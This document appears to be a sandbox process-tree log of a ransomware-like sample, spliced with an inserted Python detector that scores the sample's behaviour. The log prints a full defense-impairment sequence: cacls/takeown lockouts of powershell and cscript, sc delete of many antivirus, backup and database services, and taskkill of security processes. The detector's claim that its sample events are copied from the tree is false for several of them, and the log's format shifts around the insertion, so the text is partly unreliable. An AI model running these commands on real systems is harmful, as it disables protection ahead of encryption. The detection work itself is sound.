C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\ProgramData /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Users\Public /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeHM4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\sc.exe | sc delete "vmickvpexchange" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "vmicguestinterface" | depth 3
  - Launches sc.exe
C:\Windows\SysWOW64\sc.exe | sc delete "vmicshutdown" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "vmicheartbeat" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "vmicrdv" | depth 3
  - Launches sc.exe
C:\Windows\SysWOW64\sc.exe | sc delete "storflt" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "vmictimesync" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "vmicvss" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "hvdsvc" | depth 3
  - Launches sc.exe
C:\Windows\SysWOW64\sc.exe | sc delete "nvspwmi" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "wmms" | depth 3
  - Launches sc.exe
C:\Windows\SysWOW64\sc.exe | sc delete "AvgAdminServer" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "AVG Antivirus" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "avgAdminClient" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "SAVService" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "SAVAdminService" | depth 3
  - Launches sc.exe
C:\Windows\SysWOW64\sc.exe | sc delete "Sophos AutoUpdate Service" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "Sophos Clean Service" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "Sophos Device Control Service" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "Sophos Endpoint Defense Service" | depth 3
  - Launches sc.exe
C:\Windows\SysWOW64\sc.exe | sc delete "Sophos File Scanner Service" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "Sophos Health Service" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "Sophos MCS Agent" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "Sophos MCS Client" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "SntpService" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "swc_service" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "swi_service" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "Sophos UI" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "swi_update" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "Sophos Web Control Service" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "Sophos System Protection Service" | depth 3
  - Launches sc.exe
C:\Windows\SysWOW64\sc.exe | sc delete "Sophos Safestore Service" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "hmpalertsvc" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "RpcEptMapper" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "Sophos Endpoint Defense Service" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "SophosFIM" | depth 3
  - Launches sc.exe
C:\Windows\SysWOW64\sc.exe | sc delete "swi_filter" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "FirebirdGuardianDefaultInstance" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "FirebirdServerDefaultInstance" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "MSSQLFDLauncher" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "MSSQLSERVER" | depth 3
  - Launches sc.exe
C:\Windows\SysWOW64\sc.exe | sc delete "SQLSERVERAGENT" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "SQLBrowser" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "SQLTELEMETRY" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "MsDtsServer130" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "SSISTELEMETRY130" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "SQLWriter" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "MSSQL$VEEAMSQL2012" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "SQLAgent$VEEAMSQL2012" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "MSSQL" | depth 3
  - Launches sc.exe
C:\Windows\SysWOW64\sc.exe | sc delete "SQLAgent" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "MSSQLServerADHelper100" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "MSSQLServerOLAPService" | depth 3
  - Launches sc.exe
C:\Windows\SysWOW64\sc.exe | sc delete "MsDtsServer100" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "ReportServer" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "SQLTELEMETRY$HL" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "TMBMServer" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "MSSQL$PROGID" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "MSSQL$WOLTERSKLUWER" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "SQLAgent$PROGID" | depth 3
  - Launches sc.exe
C:\Windows\SysWOW64\sc.exe | sc delete "SQLAgent$WOLTERSKLUWER" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "MSSQLFDLauncher$OPTIMA" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "MSSQL$OPTIMA" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "SQLAgent$OPTIMA" | depth 3
  - Launches sc.exe
C:\Windows\SysWOW64\sc.exe | sc delete "ReportServer$OPTIMA" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "msftesql$SQLEXPRESS" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "postgresql-x64-9.4" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "WRSVC" | depth 3
  - Launches sc.exe
C:\Windows\SysWOW64\sc.exe | sc delete "ekrn" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "ekrnEpsw" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "klim6" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "AVP18.0.0" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "KLIF" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "klpd" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "klflt" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "klbackupdisk" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "klbackupflt" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "klkbdflt" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "klmouflt" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "klhk" | depth 3
  - Launches sc.exe
C:\Windows\SysWOW64\sc.exe | sc delete "KSDE1.0.0" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "kltap" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "ScSecSvc" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "Core Mail Protection" | depth 3
  - Launches sc.exe
C:\Windows\SysWOW64\sc.exe | sc delete "Core Scanning Server" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "Core Scanning ServerEx" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "Online Protection System" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "RepairService" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "Core Browsing Protection" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "Quick Update Service" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "McAfeeFramework" | depth 3
  - Launches sc.exe
C:\Windows\SysWOW64\sc.exe | sc delete "macmnsvc" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "masvc" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "mfemms" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "mfevtp" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "TmFilter" | depth 3
  - Launches sc.exe
C:\Windows\SysWOW64\sc.exe | sc delete "TMLWCSService" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "tmusa" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "TmPreFilter" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "TMSmartRelayService" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "TMiCRCScanService" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "VSApiNt" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "TmCCSF" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "tmlisten" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "TmProxy" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "ntrtscan" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "ofcservice" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "TmPfw" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "PccNTUpd" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "PandaAetherAgent" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "PSUAService" | depth 3
C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop QPCore | depth 4
C:\Windows\SysWOW64\sc.exe | sc delete "NanoServiceMain" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "EPIntegrationService" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "EPProtectedService" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "EPRedline" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "EPSecurityService" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "EPUpdateService" | depth 3
C:\Windows\SysWOW64\sc.exe | sc delete "UniFi" | depth 3
C:\Windows\SysWOW64\taskkill.exe | taskkill -f -im PccNTMon.exe | depth 3
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\SysWOW64\taskkill.exe | taskkill -f -im NTRtScan.exe | depth 3
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\SysWOW64\taskkill.exe | taskkill -f -im TmListen.exe | depth 3
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\SysWOW64\taskkill.exe | taskkill -f -im TmCCSF.exe | depth 3
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\SysWOW64\taskkill.exe | taskkill -f -im TmProxy.exe | depth 3
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\SysWOW64\taskkill.exe | taskkill -f -im TMBMSRV.exe | depth 3
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\SysWOW64\taskkill.exe | taskkill -f -im TMBMSRV.exe | depth 3
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\SysWOW64\taskkill.exe | taskkill -f -im TmPfw.exe | depth 3
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\SysWOW64\taskkill.exe | taskkill -f -im CNTAoSMgr.exe | depth 3
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\SysWOW64\taskkill.exe | taskkill -f -im sqlbrowser.exe | depth 3
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\SysWOW64\taskkill.exe | taskkill -f -im sqlwriter.exe | depth 3
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\SysWOW64\taskkill.exe | taskkill -f -im sqlservr.exe | depth 3
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\SysWOW64\taskkill.exe | taskkill -f -im msmdsrv.exe | depth 3
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\SysWOW64\taskkill.exe | taskkill -f -im MsDtsSrvr.exe | depth 3
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\SysWOW64\taskkill.exe | taskkill -f -im sqlceip.exe | depth 3
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\SysWOW64\taskkill.exe | taskkill -f -im fdlauncher.exe | depth 3
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\SysWOW64\taskkill.exe | taskkill -f -im Ssms.exe | depth 3
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\SysWOW64\taskkill.exe | taskkill -f -im SQLAGENT.EXE | depth 3
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\SysWOW64\taskkill.exe | taskkill -f -im fdhost.exe | depth 3
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\SysWOW64\taskkill.exe | taskkill -f -im fdlauncher.exe | depth 3
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\SysWOW64\taskkill.exe | taskkill -f -im sqlservr.exe | depth 3
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\SysWOW64\taskkill.exe | taskkill -f -im ReportingServicesService.exe | depth 3
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\SysWOW64\taskkill.exe | taskkill -f -im msftesql.exe | depth 3
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\SysWOW64\taskkill.exe | taskkill -f -im pg_ctl.exe | depth 3
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\SysWOW64\taskkill.exe | taskkill -f -im postgres.exe | depth 3
  - Suspicious use of AdjustPrivilegeToken
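The ACL lockout, the sc delete run, the taskkill run and the net stop pairs are one pre-encryption routine, and a detection that scores the batch is more reliable than one that alerts on each of the several hundred child processes. The following is an added example, not part of the sandbox report or of the sample, that classifies (image path, command line) pairs, the two fields a Sysmon Event ID 1 or Security 4688 record supplies, into four impairment categories and assigns a severity; the embedded events are copied from the tree above, while the watchlist, the thresholds, the severity labels and the ATT&CK mapping are this example's own choices. Ship these records off-host as they are generated rather than querying the local log afterwards, since routines of this kind also clear the local event logs.

```python
"""Classify process-creation records into the impairment categories seen in the tree
above and score the batch.

Added example, not part of the sandbox report or the sample. Input is a list of
(image path, command line) pairs; the embedded events are copied from the process
tree, while the watchlist, thresholds and severity labels are this example's choices.
"""
from collections import Counter

# Trustees whose explicit Deny on a binary locks out service and EDR tooling.
PROTECTED_TRUSTEES = {"system", "service", "network service", "local service", "trustedinstaller"}

# Security, backup/VSS and database services and processes the sample removes, stops
# or kills (names taken from the tree, lower-cased); extend to taste.
WATCHLIST = {
    "windefend", "sophos endpoint defense service", "savservice", "hmpalertsvc", "ekrn",
    "mcafeeframework", "mfemms", "wrsvc", "psuaservice", "epprotectedservice",
    "vmicvss", "sqlwriter", "qbvss", "shadowprotectsvc", "synology drive vss service x64",
    "mssqlserver", "sqlserveragent", "sqlbrowser", "msexchangeis", "postgresql-x64-9.4",
    "sqlservr.exe", "postgres.exe", "ntrtscan.exe", "tmlisten.exe", "tmbmsrv.exe", "tmpfw.exe",
}

ATTACK = {  # MITRE ATT&CK technique per category (this example's mapping)
    "acl_lockout": "T1222.001", "service_delete": "T1562.001",
    "service_stop": "T1489", "process_kill": "T1489",
}

# Constructed sample: (image, command line) pairs copied from the tree above.
SAMPLE_EVENTS = [
    (r"C:\Windows\SysWOW64\takeown.exe", r"takeown /f C:\Windows\system32\net1.exe /a"),
    (r"C:\Windows\SysWOW64\cacls.exe", r"cacls C:\Windows\system32\net1.exe /g Administrators:f"),
    (r"C:\Windows\SysWOW64\cacls.exe", r'cacls C:\Windows\system32\net1.exe /e /d "network service"'),
    (r"C:\Windows\SysWOW64\cacls.exe", r"cacls C:\Windows\system32\net1.exe /e /d system"),
    (r"C:\Windows\SysWOW64\cacls.exe", r"cacls C:\ProgramData /e /d system"),
    (r"C:\Windows\SysWOW64\cmd.exe", r'C:\Windows\system32\cmd.exe /S /D /c" echo y"'),
    (r"C:\Windows\SysWOW64\sc.exe", r'sc delete "Sophos Endpoint Defense Service"'),
    (r"C:\Windows\SysWOW64\sc.exe", r'sc delete "MSSQLSERVER"'),
    (r"C:\Windows\SysWOW64\sc.exe", r'sc delete "vmicvss"'),
    (r"C:\Windows\SysWOW64\taskkill.exe", r"taskkill -f -im sqlservr.exe"),
    (r"C:\Windows\SysWOW64\net.exe", r"net stop WinDefend"),
    (r"C:\Windows\SysWOW64\net1.exe", r"C:\Windows\system32\net1 stop WinDefend"),
    (r"C:\Windows\SysWOW64\net1.exe", r'C:\Windows\system32\net1 stop "Synology Drive VSS Service x64"'),
]


def tokenize(cmdline):
    """Split on whitespace, keeping "quoted strings" as one token (quotes removed)."""
    tokens, cur, quoted = [], [], False
    for ch in cmdline:
        if ch == '"':
            quoted = not quoted
        elif ch.isspace() and not quoted:
            if cur:
                tokens.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        tokens.append("".join(cur))
    return tokens


def _arg_after(tokens, flag):
    """Token following a case-insensitive flag, or None."""
    low = [t.lower() for t in tokens]
    if flag in low and low.index(flag) + 1 < len(tokens):
        return tokens[low.index(flag) + 1]
    return None


def classify(image, cmdline):
    """Return (category, detail) for an impairment command, else None."""
    exe = image.rsplit("\\", 1)[-1].lower()  # trust the image path, not argv[0]
    tokens = tokenize(cmdline)
    if len(tokens) < 2:
        return None
    low = [t.lower() for t in tokens]
    if exe == "takeown.exe":
        target = _arg_after(tokens, "/f")
        return ("acl_lockout", f"takeown {target}") if target else None
    if exe == "cacls.exe":
        target = tokens[1]
        trustee = _arg_after(tokens, "/d")
        if trustee and trustee.lower() in PROTECTED_TRUSTEES:
            return ("acl_lockout", f"deny {trustee.lower()} on {target}")
        if "/g" in low and "/e" not in low:  # /g without /e replaces the whole DACL
            return ("acl_lockout", f"replace ACL on {target}")
        return None
    if exe == "sc.exe" and low[1] == "delete" and len(tokens) > 2:
        return ("service_delete", tokens[2])
    if exe in ("net.exe", "net1.exe") and low[1] == "stop" and len(tokens) > 2:
        return ("service_stop", tokens[2])
    if exe == "taskkill.exe":
        target = _arg_after(tokens, "-im") or _arg_after(tokens, "/im")
        return ("process_kill", target) if target else None
    return None


def summarize(events):
    """Deduplicated findings, per-category counts and a severity for the whole batch."""
    findings, seen = [], set()
    for image, cmdline in events:
        f = classify(image, cmdline)
        if f and (f[0], f[1].lower()) not in seen:  # net.exe and net1.exe report the same stop
            seen.add((f[0], f[1].lower()))
            findings.append(f)
    counts = Counter(cat for cat, _ in findings)
    watch_hits = sum(1 for cat, name in findings if cat != "acl_lockout" and name.lower() in WATCHLIST)
    if counts["acl_lockout"] and watch_hits >= 3:
        severity = "high"
    elif counts["acl_lockout"] or watch_hits >= 3:
        severity = "medium"
    elif findings:
        severity = "low"
    else:
        severity = "none"
    return {"findings": findings, "counts": counts, "watch_hits": watch_hits,
            "severity": severity, "techniques": sorted({ATTACK[cat] for cat in counts})}


if __name__ == "__main__":
    print(summarize(SAMPLE_EVENTS))
```

The classifier keys on the image path rather than argv[0], so a renamed copy of sc.exe or cacls.exe still lands in the right branch as long as the event source records the real image; the echo helpers fall through as noise. The "high" verdict requires both an ACL lockout and at least three watchlist hits, which keeps a lone administrator stopping SQLWriter for maintenance at "low".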
C:\Windows\SysWOW64\net.exe | net stop MSSQLServerADHelper100 | depth 3
C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop MSSQLServerADHelper100 | depth 4
C:\Windows\SysWOW64\net.exe | net stop MSSQL$ISARS | depth 3
C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop MSSQL$ISARS | depth 4
C:\Windows\SysWOW64\net.exe | net stop MSSQL$MSFW | depth 3
C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop MSSQL$MSFW | depth 4
C:\Windows\SysWOW64\net.exe | net stop SQLAgent$ISARS | depth 3
C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop SQLAgent$ISARS | depth 4
C:\Windows\SysWOW64\net.exe | net stop SQLAgent$MSFW | depth 3
C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop SQLAgent$MSFW | depth 4
C:\Windows\SysWOW64\net.exe | net stop SQLBrowser | depth 3
C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop SQLBrowser | depth 4
C:\Windows\SysWOW64\net.exe | net stop ReportServer$ISARS | depth 3
C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop ReportServer$ISARS | depth 4
C:\Windows\SysWOW64\net.exe | net stop SQLWriter | depth 3
